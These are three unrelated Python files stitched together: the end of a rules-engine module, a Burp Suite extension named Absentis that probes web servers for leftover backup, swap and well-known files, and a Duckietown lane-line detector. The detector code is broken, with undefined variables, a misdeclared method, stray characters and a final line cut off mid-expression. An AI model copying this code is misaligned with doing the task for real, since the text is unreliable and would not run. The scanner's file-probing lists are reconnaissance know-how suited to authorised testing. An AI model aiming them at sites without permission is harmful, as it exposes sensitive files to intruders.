rule['run'] = trigger['run']
elif hasattr(trigger['run'], '__call__'):
rule['run'] = Promise(trigger['run'])
if 'to' in trigger:
from_state = None
if qualified_name in reflexive_states:
from_state = qualified_name
to_state = trigger['to']
assert_state = False
if to_state in reflexive_states:
assert_state = True
if 'run' in rule:
rule['run'].continue_with(To(from_state, to_state, assert_state))
else:
rule['run'] = To(from_state, to_state, assert_state)
if to_state in start_state:
del start_state[to_state]
if parent_start_state and to_state in parent_start_state:
del parent_start_state[to_state]
else:
raise Exception('Trigger {0} destination not defined'.format(trigger_name))
rules[trigger_name] = rule;
started = False
for state_name in start_state.keys():
if started:
raise Exception('Chart {0} has more than one start state {1}'.format(self._name, state_name))
started = True
if parent_name:
rules[parent_name + '$start'] = {'all':[{'chart_context': {'$and': [{'label': parent_name}, {'chart':1}]}}], 'run': To(None, state_name, False)};
else:
rules['$start'] = {'all': [{'chart_context': {'$and': [{'$nex': {'running': 1}}, {'$s': 1}]}}], 'run': To(None, state_name, False)};
if not started:
raise Exception('Chart {0} has no start state'.format(self._name))
class Flowchart(Ruleset):
def __init__(self, name, host, chart_definition, state_cache_size):
self._name = name
self._host = host
ruleset_definition = {}
self._transform(chart_definition, ruleset_definition)
super(Flowchart, self).__init__(name, host, ruleset_definition, state_cache_size)
self._definition = chart_definition
self._definition['$type'] = 'flowChart'
def _transform(self, chart_definition, rules):
visited = {}
reflexive_stages = {}
for stage_name, stage in chart_definition.items():
if 'to' in stage:
if isinstance(stage['to'], str):
if stage['to'] == stage_name:
reflexive_stages[stage_name] = True
else:
for transition_name, transition in stage['to'].items():
if transition_name == stage_name or 'count' in transition or 'cap' in transition:
reflexive_stages[stage_name] = True
for stage_name, stage in chart_definition.items():
stage_test = {'chart_context': {'$and':[{'label': stage_name}, {'chart':1}]}}
from_stage = None
if stage_name in reflexive_stages:
from_stage = stage_name
if 'to' in stage:
if isinstance(stage['to'], str):
next_stage = None
rule = {'all': [stage_test]}
if stage['to'] in chart_definition:
next_stage = chart_definition[stage['to']]
else:
raise Exception('Stage {0} not found'.format(stage['to']))
assert_stage = False
if stage['to'] in reflexive_stages:
assert_stage = True
if not 'run' in next_stage:
rule['run'] = To(from_stage, stage['to'], assert_stage)
else:
if isinstance(next_stage['run'], str):
rule['run'] = To(from_stage, stage['to'], assert_stage).continue_with(Promise(self._host.get_action(next_stage['run'])))
elif isinstance(next_stage['run'], Promise) or hasattr(next_stage['run'], '__call__'):
rule['run'] = To(from_stage, stage['to'], assert_stage).continue_with(next_stage['run'])
rules['{0}.{1}'.format(stage_name, stage['to'])] = rule
visited[stage['to']] = True
else:
for transition_name, transition in stage['to'].items():
rule = {}
next_stage = None
if 'pri' in transition:
rule['pri'] = transition['pri']
if 'count' in transition:
rule['count'] = transition['count']
if 'cap' in transition:
rule['cap'] = transition['cap']
if 'all' in transition:
rule['all'] = list(transition['all'])
rule['all'].append(stage_test)
elif 'any' in transition:
rule['all'] = [stage_test, {'m$any': transition['any']}]
else:
rule['all'] = [stage_test]
if transition_name in chart_definition:
next_stage = chart_definition[transition_name]
else:
raise Exception('Stage {0} not found'.format(transition_name))
assert_stage = False
if transition_name in reflexive_stages:
assert_stage = True
if not 'run' in next_stage:
rule['run'] = To(from_stage, transition_name, assert_stage)
else:
if isinstance(next_stage['run'], str):
rule['run'] = To(from_stage, transition_name, assert_stage).continue_with(Promise(self._host.get_action(next_stage['run'])))
elif isinstance(next_stage['run'], Promise) or hasattr(next_stage['run'], '__call__'):
rule['run'] = To(from_stage, transition_name, assert_stage).continue_with(next_stage['run'])
rules['{0}.{1}'.format(stage_name, transition_name)] = rule
visited[transition_name] = True
started = False
for stage_name, stage in chart_definition.items():
if not stage_name in visited:
if started:
raise Exception('Chart {0} has more than one start state'.format(self._name))
rule = {'all': [{'chart_context': {'$and': [{'$nex': {'running': 1}}, {'$s': 1}]}}]}
if not 'run' in stage:
rule['run'] = To(None, stage_name, False)
else:
if isinstance(stage['run'], str):
rule['run'] = To(None, stage_name, False).continue_with(Promise(self._host.get_action(stage['run'])))
elif isinstance(stage['run'], Promise) or hasattr(stage['run'], '__call__'):
rule['run'] = To(None, stage_name, False).continue_with(stage['run'])
rules['$start.{0}'.format(stage_name)] = rule
started = True
class Host(object):
def __init__(self, ruleset_definitions = None, databases = None, state_cache_size = 1024):
if not databases:
databases = [{'host': 'localhost', 'port': 6379, 'password': None, 'db': 0}]
self._ruleset_directory = {}
self._ruleset_list = []
self._databases = databases
self._state_cache_size = state_cache_size
if ruleset_definitions:
self.register_rulesets(None, ruleset_definitions)
def get_action(self, action_name):
raise Exception('Action with name {0} not found'.format(action_name))
def load_ruleset(self, ruleset_name):
raise Exception('Ruleset with name {0} not found'.format(ruleset_name))
def save_ruleset(self, ruleset_name, ruleset_definition):
return
def get_ruleset(self, ruleset_name):
if ruleset_name in self._ruleset_directory:
return self._ruleset_directory[ruleset_name]
else:
ruleset_definition = self.load_ruleset(ruleset_name)
self.register_rulesets(None, ruleset_definition)
return self._ruleset_directory[ruleset_name]
def set_ruleset(self, ruleset_name, ruleset_definition):
self.register_rulesets(None, ruleset_definition)
self.save_ruleset(ruleset_name, ruleset_definition)
def get_state(self, ruleset_name, sid):
return self.get_ruleset(ruleset_name).get_state(sid)
def delete_state(self, ruleset_name, sid):
self.get_ruleset(ruleset_name).delete_state(sid)
def get_ruleset_state(self, ruleset_name):
return self.get_ruleset(ruleset_name).get_ruleset_state(sid)
def post_batch(self, ruleset_name, messages):
return self.get_ruleset(ruleset_name).assert_events(messages)
def start_post_batch(self, ruleset_name, messages):
return self.get_ruleset(ruleset_name).start_assert_events(messages)
def post(self, ruleset_name, message):
return self.get_ruleset(ruleset_name).assert_event(message)
def start_post(self, ruleset_name, message):
return self.get_ruleset(ruleset_name).start_assert_event(message)
def assert_fact(self, ruleset_name, fact):
return self.get_ruleset(ruleset_name).assert_fact(fact)
def start_assert_fact(self, ruleset_name, fact):
return self.get_ruleset(ruleset_name).start_assert_fact(fact)
def assert_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).assert_facts(facts)
def start_assert_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).start_assert_facts(facts)
def retract_fact(self, ruleset_name, fact):
return self.get_ruleset(ruleset_name).retract_fact(fact)
def start_retract_fact(self, ruleset_name, fact):
return self.get_ruleset(ruleset_name).start_retract_fact(fact)
def retract_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).retract_facts(facts)
def start_retract_facts(self, ruleset_name, facts):
return self.get_ruleset(ruleset_name).start_retract_facts(facts)
def patch_state(self, ruleset_name, state):
return self.get_ruleset(ruleset_name).assert_state(state)
def renew_action_lease(self, ruleset_name, sid):
self.get_ruleset(ruleset_name).renew_action_lease(sid)
def register_rulesets(self, parent_name, ruleset_definitions):
rulesets = Ruleset.create_rulesets(parent_name, self, ruleset_definitions, self._state_cache_size)
for ruleset_name, ruleset in rulesets.items():
if ruleset_name in self._ruleset_directory:
raise Exception('Ruleset with name {0} already registered'.format(ruleset_name))
else:
self._ruleset_directory[ruleset_name] = ruleset
self._ruleset_list.append(ruleset)
ruleset.bind(self._databases)
return list(rulesets.keys())
def run(self):
def dispatch_ruleset(index, wait):
def callback(e, w):
inner_wait = wait
if e:
if str(e).find('306') == -1:
print('Exiting {0}'.format(str(e)))
os._exit(1)
elif not w:
inner_wait = False
if (index == (len(self._ruleset_list) -1)) and inner_wait:
self._d_timer = threading.Timer(0.25, dispatch_ruleset, ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._d_timer.daemon = True
self._d_timer.start()
else:
self._d_timer = threading.Thread(target = dispatch_ruleset, args = ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._d_timer.daemon = True
self._d_timer.start()
if not len(self._ruleset_list):
self._d_timer = threading.Timer(0.5, dispatch_ruleset, (0, False, ))
self._d_timer.daemon = True
self._d_timer.start()
else:
ruleset = self._ruleset_list[index]
if not index:
wait = True
ruleset.dispatch(callback)
def dispatch_timers(index, wait):
def callback(e, w):
inner_wait = wait
if e:
print('Error {0}'.format(str(e)))
elif not w:
inner_wait = False
if (index == (len(self._ruleset_list) -1)) and inner_wait:
self._t_timer = threading.Timer(0.25, dispatch_timers, ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._t_timer.daemon = True
self._t_timer.start()
else:
self._t_timer = threading.Thread(target = dispatch_timers, args = ((index + 1) % len(self._ruleset_list), inner_wait, ))
self._t_timer.daemon = True
self._t_timer.start()
if not len(self._ruleset_list):
self._t_timer = threading.Timer(0.5, dispatch_timers, (0, False, ))
self._t_timer.daemon = True
self._t_timer.start()
else:
ruleset = self._ruleset_list[index]
if not index:
wait = True
ruleset.dispatch_timers(callback)
self._d_timer = threading.Timer(0.1, dispatch_ruleset, (0, False, ))
self._d_timer.daemon = True
self._d_timer.start()
self._t_timer = threading.Timer(0.1, dispatch_timers, (0, False, ))
self._t_timer.daemon = True
self._t_timer.start()
class Queue(object):
def __init__(self, ruleset_name, database = None, state_cache_size = 1024):
if not database:
database = {'host': 'localhost', 'port': 6379, 'password':None, 'db': 0}
self._ruleset_name = ruleset_name
self._handle = rules.create_client(state_cache_size, ruleset_name)
if isinstance(database, str):
rules.bind_ruleset(0, 0, database, None, self._handle)
else:
if not 'password' in database:
database['password'] = None
if not 'db' in database:
database['db'] = 0
rules.bind_ruleset(database['port'], database['db'], database['host'], database['password'], self._handle)
def isClosed(self):
return self._handle == 0
def post(self, message):
if self._handle == 0:
raise Exception('Queue has already been closed')
if 'sid' in message:
rules.queue_assert_event(self._handle, str(message['sid']), self._ruleset_name, json.dumps(message, ensure_ascii=False))
else:
rules.queue_assert_event(self._handle, None, self._ruleset_name, json.dumps(message, ensure_ascii=False))
def assert_fact(self, message):
if self._handle == 0:
raise Exception('Queue has already been closed')
if 'sid' in message:
rules.queue_assert_fact(self._handle, str(message['sid']), self._ruleset_name, json.dumps(message, ensure_ascii=False))
else:
rules.queue_assert_fact(self._handle, None, self._ruleset_name, json.dumps(message, ensure_ascii=False))
def retract_fact(self, message):
if self._handle == 0:
raise Exception('Queue has already been closed')
if 'sid' in message:
rules.queue_retract_fact(self._handle, str(message['sid']), self._ruleset_name, json.dumps(message, ensure_ascii=False))
else:
rules.queue_retract_fact(self._handle, None, self._ruleset_name, json.dumps(message, ensure_ascii=False))
def close(self):
if self._handle != 0:
rules.delete_client(self._handle)
self._handle = 0
|
absentis.py | import os.path
from burp import IBurpExtender, IIntruderPayloadGeneratorFactory, IIntruderPayloadGenerator, IScannerCheck, IScanIssue, IScannerInsertionPointProvider, IContextMenuFactory, IContextMenuInvocation, IScannerInsertionPoint, IScanIssue, IExtensionStateListener
import json
from java.io import PrintWriter
from javax.swing import JMenuItem
from java.util import List,ArrayList
import datetime
import threading
CONFIG_FILENAME = '.absentis.conf'
EXTENSION_NAME = 'Absentis'
INSERTION_POINT_NAME = 'Absentis URL insertion point'
GENERATOR_NAME = 'Absentis URL Generator Factory'
config_defaults = {
'file_append_values' : [
'.bak',
'.bkp',
'.backup',
'.old',
'.src',
'.data',
'.dev',
'.inc',
'.orig',
'.original',
'.copy',
'.tmp',
'.swp',
'~'
],
'rootdir_values' : [
'robots.txt',
'humans.txt',
'security.txt',
'sitemap.xml'
],
'dir_values' : [
'crossdomain.xml',
'clientaccesspolicy.xml'
],
'scanner_check' : True,
'global_active_scan' : False, # for various reasons based on how the scanner is tuned this often isnt effectve, disable until fixed
'intruder_payload_generator' : True,
'context_menu_active_scan' : True
}
# TODO
# zip, bz2, gz, tar, tar.bz2, tar.gz, .tgz, .rar
# git repo files
# windows copy
# directories with
# 8.3 filenames? including for filter bypassing
# replacing extensions too? .java, .inc, .config, .asa, and many of the above list
# 200 is a legit call
# 403 is worth a closer check 9
class Parser:
def __init__(self, config):
self.config = config
def _split_path(self, url):
return [a[::-1] for a in url.split('?')[0][::-1].split('/', 1)][::-1]
def parser_file_append(self, url):
if url.endswith('/'):
return []
return [url.split('?')[0] + a for a in self.config['file_append_values']]
def parser_vim_swp(self, url):
if url.endswith('/'):
return []
return [(lambda x: '{}/.{}.swp'.format(x[0], x[1]))(self._split_path(url))]
def parser_rootdir(self, url):
if url.count('/') == 1:
return ['/{}'.format(a) for a in self.config['rootdir_values']]
else:
return []
def parser_dir(self, url):
return ['{}/{}'.format(self._split_path(url)[0], a) for a in self.config['dir_values']]
def get_parser_output(self, url):
out = []
for parser in [a for a in dir(self) if a.startswith('parser_')]:
out += getattr(self, parser)(url)
return out
class BurpExtender(IBurpExtender):
'''BurpExtender Class to register the extension with Burp Suite'''
def registerExtenderCallbacks(self, callbacks):
'''Interface method to register the extender callbacks'''
config_file = os.path.join(os.path.expanduser("~"), CONFIG_FILENAME)
stdout = PrintWriter(callbacks.getStdout(), True)
stderr = PrintWriter(callbacks.getStderr(), True)
continue_load = True
if not os.path.isfile(config_file):
open(config_file, 'w').write(json.dumps(config_defaults, indent=4, sort_keys=True))
stdout.println('Existing config file not found. Wrote default config file values to ~/{}'.format(CONFIG_FILENAME))
config = config_defaults
else:
try:
config = json.load(open(config_file))
stdout.println('Loaded configuration from: ~/{}'.format(CONFIG_FILENAME))
except Exception as e:
stderr.println('An error occuring reading the config file ~/{}: {}.\nTerminating extension.'.format(CONFIG_FILENAME, e))
contine_load = False
if continue_load:
callbacks.setExtensionName(EXTENSION_NAME)
if config['intruder_payload_generator']:
callbacks.registerIntruderPayloadGeneratorFactory(PayloadGeneratorFactory(callbacks, config))
stdout.println('Intruder payload generator registered')
if config['global_active_scan']:
callbacks.registerScannerInsertionPointProvider(InsertionPointProvider(callbacks, config))
stdout.println('Checks now registered to be performed as part of a regular Active Scan')
config['scanner_check'] = True
if config['context_menu_active_scan']:
callbacks.registerContextMenuFactory(ContextMenu(callbacks, config))
stdout.println('Context menu to actively scan selected request registered')
config['scanner_check'] = True
if config['scanner_check']:
callbacks.registerScannerCheck(Scanner(callbacks, config))
stdout.println('Scanner check registered')
stdout.println('Extension loaded!')
class ContextMenu(IContextMenuFactory):
def __init__(self, callbacks, config):
self.callbacks = callbacks
self.config = config
self.helpers = callbacks.getHelpers()
def createMenuItems(self, IContextMenuInvocation):
self.selectedMessages = IContextMenuInvocation.getSelectedMessages()
menuItemList = ArrayList()
menuItemList.add(JMenuItem("Actively scan request with Absentis", actionPerformed = self.onClick))
return menuItemList
def runScan(self):
stderr = PrintWriter(self.callbacks.getStderr(), True)
for message in self.selectedMessages:
request = message.getRequest()
http_service = message.getHttpService()
a_request = self.helpers.analyzeRequest(http_service, request)
url = '/' + str(a_request.getUrl()).split('/', 3)[-1]
insertion_point = InsertionPoint(self.callbacks, self.config, request, url)
if insertion_point.checkValid():
for scanner in self.callbacks.getScannerChecks():
issues = scanner.doActiveScan(message, insertion_point)
for issue in issues:
url = str(issue.getUrl())
url = '{}/{}/{}'.format('/'.join(url.split('/')[:2]), url.split('/')[2].split(':')[0], url.split('/', 3)[-1]) # no port in hostname
exists = False
for existing_issue in self.callbacks.getScanIssues(url):
if existing_issue.getIssueName() == issue.getIssueName():
exists = True
if not exists:
self.callbacks.addScanIssue(issue)
stderr.println('Finished scan')
def onClick(self, event):
t = threading.Thread(target=self.runScan)
t.daemon = True
t.start()
class StateLoader(IExtensionStateListener):
def __init__(self, callbacks, config):
self.callbacks = callbacks
self.config = config
def extensionUnloaded(self):
pass
class Scanner(IScannerCheck):
def __init__(self, callbacks, config):
self.callbacks = callbacks
self.helpers = callbacks.getHelpers()
self.config = config
def doPassiveScan(self, baseRequestResponse):
# return None or a list of IScanIssue objects
return None
def doActiveScan(self, baseRequestResponse, insertionPoint):
# This implements the scan, including making a request/s, receiving the responses,
# creating scan issues for relevant issues and returning them or None
# is called for each active scan, for each insertion point - filter for
stderr = PrintWriter(self.callbacks.getStderr(), True)
stdout = PrintWriter(self.callbacks.getStdout(), True)
out = None
# filter for the insertion poitns we care about
if insertionPoint.getInsertionPointName() == INSERTION_POINT_NAME or insertionPoint.getInsertionPointType() in [33, 37]:
#stderr.println('Enabled insertion point {}'.format(insertionPoint.getInsertionPointName()))
http_service = baseRequestResponse.getHttpService()
host = http_service.getHost()
port = http_service.getPort()
useHttps = http_service.getProtocol() == 'https'
parser = Parser(self.config)
payloads = parser.get_parser_output(insertionPoint.getBaseValue())
for payload in payloads:
request = insertionPoint.buildRequest(self.helpers.stringToBytes(payload))
requestResponse = self.callbacks.makeHttpRequest(http_service, request)
response = requestResponse.getResponse()
analysed_response = self.helpers.analyzeResponse(response)
if analysed_response.getStatusCode() == 200:
scanIssue = ScanIssue(self.callbacks, self.config, requestResponse, payload)
if not out:
out = []
out.append(scanIssue)
#stderr.println('Finished for: {}'.format(payload))
return out
def consolidateDuplicateIssues(self, existingIssue, newIssue): # typeIScanIssue
if existingIssue.getIssueName() == newIssue.getIssueName():
return -1
else:
return 0 # 0 for both issues, -1 for existing only, 1 for the new issue only
class InsertionPoint(IScannerInsertionPoint):
def __init__(self, callbacks, config, request, url):
self.callbacks = callbacks
self.helpers = callbacks.getHelpers()
self.request = self.helpers.bytesToString(request)
self.url = url
self.start = self.request.find(url)
self.end = self.start+len(url)
self.enabled = True # disable by default so this is used only for this extensions Scanner
self.stderr = PrintWriter(self.callbacks.getStderr(), True)
def enable(self):
self.enabled = True
def disable(self):
self.enabled = False
def checkValid(self):
return self.start > 0
def buildRequest(self, payload):
#self.stderr.println('buildRequest called')
#if self.enabled:
p = self.request[:self.start] + self.helpers.bytesToString(payload) + self.request[self.end:]
return self.helpers.stringToBytes(p)
#else:
#return None
def getBaseValue(self):
#self.stderr.println('getBaseValue called')
#if self.enabled:
return self.url
#else:
# return None
def getInsertionPointName(self):
#self.stderr.println('getInsertionPointName called')
return INSERTION_POINT_NAME
def getInsertionPointType(self):
#self.stderr.println('getInsertionPointType called')
return '\x65' #INS_URL_PATH_FILENAME 37 or INS_URL_PATH_FOLDER 33
def getPayloadOffsets(self, payload):
#self.stderr.println('getPayloadOffsets called')
return [self.start, self.start+len(payload)] if (self.checkValid() and self.enabled) else None
#TODO
# try and find a way to only have these registered insertion points used for this extensions scans
# at the moment if this insertion point provider is registered it is used for all payloads
# the scan tuning will quickly stop sending to this unless custom settings are used
# this makes the integration into regular scan workflow unusable
class InsertionPointProvider(IScannerInsertionPointProvider):
def __init__(self, callbacks, config):
self.callbacks = callbacks
self.config = config
self.helpers = callbacks.getHelpers()
def getInsertionPoints(self, baseRequestResponse):
raw_request = baseRequestResponse.getRequest()
http_service = baseRequestResponse.getHttpService()
a_request = self.helpers.analyzeRequest(http_service, raw_request)
url = '/' + str(a_request.getUrl()).split('/', 3)[-1] # the file path portion of url, e.g. /robots.txt
insertion_points = None
if url: # there should always be a url, but lets check
ip = InsertionPoint(self.callbacks, self.config, raw_request, url)
if ip.checkValid():
insertion_points = [ip]
return insertion_points
#stderr = PrintWriter(self.callbacks.getStderr(), True)
#stderr.println('Not implemented')
#TODO
# create an InsertionPoint that identifies the url in a request
# the right click option will need to duplicate this
#return None
class ScanIssue(IScanIssue):
def __init__(self, callbacks, config, requestResponse, payload):
self.callbacks = callbacks
self.stderr = PrintWriter(self.callbacks.getStderr(), True)
#self.stderr.println('Init ScanIssue')
self.config = config
self.payload = payload
self.requestResponse = requestResponse
self.http_service = requestResponse.getHttpService()
a_request = self.callbacks.getHelpers().analyzeRequest(self.http_service, requestResponse.getRequest())
self.url1 = a_request.getUrl()
#self.stderr.println('Finished Init ScanIssue')
def getUrl(self):
return self.url1
def getIssueName(self):
return 'File discovered: {}'.format(self.payload)
def getIssueType(self):
return 0x006000d8 # https://portswigger.net/kb/issues
def getIssueDetail(self):
return 'No additional detail.'
def getRemediationDetail(self):
return 'Check if the file can be removed.'
def getSeverity(self):
return 'Information' # "High", "Medium", "Low", "Information" or "False positive".
def getConfidence(self):
return 'Certain' # Firm, Tentative
def getIssueBackground(self):
return 'Found a file: {}'.format(self.payload)
def getRemediationBackground(self):
return 'File is potentially an interesting one, have a look at it.'
def getHttpMessages(self):
return [self.requestResponse]
def getHttpService(self):
return self.http_service
class PayloadGeneratorFactory(IIntruderPayloadGeneratorFactory):
def __init__(self, callbacks, config):
self.callbacks = callbacks
self.config = config
def getGeneratorName(self):
return GENERATOR_NAME
def createNewInstance(self, attack):
return PayloadGenerator(self.callbacks, self.config, attack)
class PayloadGenerator(IIntruderPayloadGenerator):
def __init__(self, callbacks, config, attack):
self.callbacks = callbacks
self.config = config
self.helpers = callbacks.getHelpers()
self.parser = Parser(config)
self.payloads = None
self.morePayloads = True
def hasMorePayloads(self):
return self.morePayloads
def getNextPayload(self, baseValue):
if isinstance(self.payloads, type(None)): # first run
self.payloads = self.parser.get_parser_output(self.helpers.bytesToString(baseValue))
if len(self.payloads):
payload = self.payloads.pop(0)
if len(self.payloads) == 0:
self.morePayloads = False
return payload
else: # this code path should never be reached
self.config.strerr.println('An error occured when generating payloads!')
|
line_detector_node_yellow_blue.py | #!/usr/bin/env python
from anti_instagram.AntiInstagram import *
from cv_bridge import CvBridge, CvBridgeError
from duckietown_msgs.msg import (AntiInstagramTransform, BoolStamped, Segment,
SegmentList, Vector2D)
from duckietown_utils.instantiate_utils import instantiate
from duckietown_utils.jpg import image_cv_from_jpg
from geometry_msgs.msg import Point
from sensor_msgs.msg import CompressedImage, Image
from visualization_msgs.msg import Marker
from line_detector.line_detector_plot import *
from line_detector.timekeeper import TimeKeeper
import cv2
import numpy as np
import rospy
import threading
import time
class LineDetectorNode(object):
def __init__(self):
self.node_name = "LineDetectorNode"
# Thread lock
self.thread_lock = threading.Lock()
# Constructor of line detector
self.bridge = CvBridge()
self.active = True
self.stats = Stats()
# Only be verbose every 10 cycles
self.intermittent_interval = 100
self.intermittent_counter = 0
# color correction
self.ai = AntiInstagram()
# these will be added if it becomes verbose
self.pub_edge = None
self.pub_colorSegment = None
self.detector = None
self.verbose = None
self.updateParams(None)
# Publishers
self.pub_lines = rospy.Publisher("~segment_list", SegmentList, queue_size=1)
self.pub_image = rospy.Publisher("~image_with_lines", Image, queue_size=1)
# Subscribers
self.sub_image = rospy.Subscriber("~image", CompressedImage, self.cbImage, queue_size=1)
self.sub_transform = rospy.Subscriber("~transform", AntiInstagramTransform, self.cbTransform, queue_size=1)
self.sub_switch = rospy.Subscriber("~switch", BoolStamped, self.cbSwitch, queue_size=1)
rospy.loginfo("[%s] Initialized (verbose = %s)." %(self.node_name, self.verbose))
rospy.Timer(rospy.Duration.from_sec(2.0), self.updateParams)
def updateParams(self, _event):
old_verbose = self.verbose
self.verbose = rospy.get_param('~verbose', True)
# self.loginfo('verbose = %r' % self.verbose)
if self.verbose != old_verbose:
self.loginfo('Verbose is now %r' % self.verbose)
self.image_size = rospy.get_param('~img_size')
self.top_cutoff = rospy.get_param('~top_cutoff')
if self.detector is None:
c = rospy.get_param('~detector')
assert isinstance(c, list) and len(c) == 2, c
# if str(self.detector_config) != str(c):
self.loginfo('new detector config: %s' % str(c))
self.detector = instantiate(c[0], c[1])
# self.detector_config = c
if self.verbose and self.pub_edge is None:
self.pub_edge = rospy.Publisher("~edge", Image, queue_size=1)
self.pub_colorSegment = rospy.Publisher("~colorSegment", Image, queue_size=1)
def cbSwitch(self, switch_msg):
self.active = switch_msg.data
def cbImage(self, image_msg):
self.stats.received()
if not self.active:
return
# Start a daemon thread to process the image
thread = threading.Thread(target=self.processImage,args=(image_msg,))
thread.setDaemon(True)
thread.start()
# Returns rightaway
def cbTransform(self, transform_msg):
self.ai.shift = transform_msg.s[0:3]
self.ai.scale = transform_msg.s[3:6]
self.loginfo("AntiInstagram transform received")
def loginfo(self, s):
rospy.loginfo('[%s] %s' % (self.node_name, s))
def intermittent_log_now(self):
return self.intermittent_counter % self.intermittent_interval == 1
def intermittent_log(self, s):
if not self.intermittent_log_now():
return
self.loginfo('%3d:%s' % (self.intermittent_counter, s))
def processImage(self, image_msg):
if not self.thread_lock.acquire(False):
self.stats.skipped()
# Return immediately if the thread is locked
return
try:
self.processImage_(image_msg)
finally:
# Release the thread lock
self.thread_lock.release()
def processImage_(self, image_msg):
self.stats.processed()
if self.intermittent_log_now():
self.intermittent_log(self.stats.info())
self.stats.reset()
tk = TimeKeeper(image_msg)
self.intermittent_counter += 1
# Decode from compressed image with OpenCV
try:
image_cv = image_cv_from_jpg(image_msg.data)
except ValueError as e:
self.loginfo('Could not decode image: %s' % e)
return
tk.completed('decoded')
# Resize and crop image
hei_original, wid_original = image_cv.shape[0:2]
if self.image_size[0] != hei_original or self.image_size[1] != wid_original:
# image_cv = cv2.GaussianBlur(image_cv, (5,5), 2)
image_cv = cv2.resize(image_cv, (self.image_size[1], self.image_size[0]),
interpolation=cv2.INTER_NEAREST)
image_cv = image_cv[self.top_cutoff:,:,:]
tk.completed('resized')
# apply color correction: AntiInstagram
image_cv_corr = self.ai.applyTransform(image_cv)
image_cv_corr = cv2.convertScaleAbs(image_cv_corr)
tk.completed('corrected')
# Set the image to be detected
gray = cv2.cvtColor(image_cv_corr,cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray, 80, 200, apertureSize = 3)
hsv = cv2.cvtColor(image_cv_corr, cv2.COLOR_BGR2HSV)
yellow = cv2.inRange(hsv, hsv_yellow1, hsv_yellow2)
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(3, 3))
yellow = cv2.dilate(yellow, kernel)
blue = cv2.inRange(hsv, hsv_blue1, hsv_blue2)
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(3, 3))
blue = cv2.dilate(blue, kernel)
# Detect lines and normals
edge_color_yellow = cv2.bitwise_and(yellow, edges)
lines_yellow = cv2.HoughLinesP(edge_color_yellow, 1, np.pi/180, 10, np.empty(1), 3, 1)
if lines_yellow is not None:
lines_yellow = np.array(lines_yellow[0])
else:
lines_yellow = []
bw_yellow = yellow
bw_blue = blue
lines_yellow,normals_yellow = self.normals(lines_yellow,bw_yellow)
tk.completed('detected')
# SegmentList constructor
segmentList = SegmentList()
segmentList.header.stamp = image_msg.header.stamp
# Convert to normalized pixel coordinates, and add segments to segmentList
if len(yellow.lines) > 0:
segmentList.segments.extend(self.toSegmentMsg(lines_yellow, normals_yellow, Segment.YELLOW))
self.intermittent_log('# segments: white %3d yellow %3d red %3d' % (len(white.lines),
len(yellow.lines), len(red.lines)))
tk.completed('prepared')
# Publish segmentList
self.pub_lines.publish(segmentList)
tk.completed('--pub_lines--')
# VISUALIZATION only below
if self.verbose:
# Draw lines and normals
image_with_lines = np.copy(image_cv_corr)
for x1,y1,x2,y2 in lines_yellow:
cx= int((x1+x2)/2)
cy= int((y1+y2)/2)
if cx >158:
cx = 158
elif cx <1:
cx = 1
if (blue[cy,cx-1] == 255 and yellow[cy,cx+1] ==255) or (yellow[cy,cx-1] == 255 and blue[cy,cx+1] ==255):
cv2.line(image_with_lines, (x1,y1), (x2,y2), (0,0,255), 2)
cv2.circle(image_with_lines, (x1,y1), 2, (0,255,0))
cv2.circle(image_with_lines, (x2,y2), 2, (0,0,255))
tk.completed('drawn')
# Publish the frame with lines
image_msg_out = self.bridge.cv2_to_imgmsg(image_with_lines, "bgr8")
image_msg_out.header.stamp = image_msg.header.stamp
self.pub_image.publish(image_msg_out)
tk.completed('pub_image')
# if self.verbose:
colorSegment = color_segment(white.area, red.area, yellow.area)
edge_msg_out = self.bridge.cv2_to_imgmsg(self.detector.edges, "mono8")
colorSegment_msg_out = self.bridge.cv2_to_imgmsg(colorSegment, "bgr8")
self.pub_edge.publish(edge_msg_out)
self.pub_colorSegment.publish(colorSegment_msg_out)
tk.completed('pub_edge/pub_segment')
self.intermittent_log(tk.getall())
def onShutdown(self):
self.loginfo("Shutdown.")
def toSegmentMsg(self, lines, normals, color):
arr_cutoff = np.array((0, self.top_cutoff, 0, self.top_cutoff))
arr_ratio = np.array((1./self.image_size[1], 1./self.image_size[0], 1./self.image_size[1], 1./self.image_size[0]))
segmentMsgList = []
for x1,y1,x2,y2,norm_x,norm_y in np.hstack((lines,normals)):
cx= int((x1+x2)/2)
cy= int((y1+y2)/2)
if cx >158:
cx = 158
elif cx <1:
cx = 1
if (blue[cy,cx-1] == 255 and yellow[cy,cx+1] ==255) or (yellow[cy,cx-1] == 255 and blue[cy,cx+1] ==255):
[x1,y1,x2,y2] = (([x1,y1,x2,y2] + arr_cutoff) * arr_ratio)
segment = Segment()
segment.color = color
segment.pixels_normalized[0].x = x1
segment.pixels_normalized[0].y = y1
segment.pixels_normalized[1].x = x2
segment.pixels_normalized[1].y = y2
segment.normal.x = norm_x
segment.normal.y = norm_y
segmentMsgList.append(segment)
return segmentMsgList
def normals(lines,bw):
if len(lines) >0:
normals = []
centers = []
#find the dx dy
length = np.sum((lines[:, 0:2] -lines[:, 2:4])**2, axis=1, keepdims=True)**0.5
dx = 1.* (lines[:,3:4]-lines[:,1:2])/length
dy = 1.* (lines[:,0:1]-lines[:,2:3])/length
centers = np.hstack([(lines[:,0:1]+lines[:,2:3])/2, (lines[:,1:2]+lines[:,3:4])/2])
x3 = (centers[:,0:1] - 3.*dx).astype('int')
x3[x3<0]=0
x3[x3>=160]=160-1
y3 = (centers[:,1:2] - 3.*dy).astype('int')
y3[y3<0]=0
y3[y3>=120]=120-1
x4 = (centers[:,0:1] + 3.*dx).astype('int')
x4[x4<0]=0
x4[x4>=160]=160-1
โ
y4 = (centers[:,1:2] + 3.*dy).astype('int')
y4[y4<0]=0
y4[y4>=120]=120-1
โ
flag_signs = (np.logical_and(bw[y3,x3]>0, bw[y4,x4]==0)).astype('int')*2-1
normals = np.hstack([dx, dy]) * flag_signs
flag = ((lines[:,2]-lines[:,0])*normals[:,1] - (lines[:,3]-lines[:,1])*normals[:,0])>
for i in range(len(lines)):
if flag[i]:
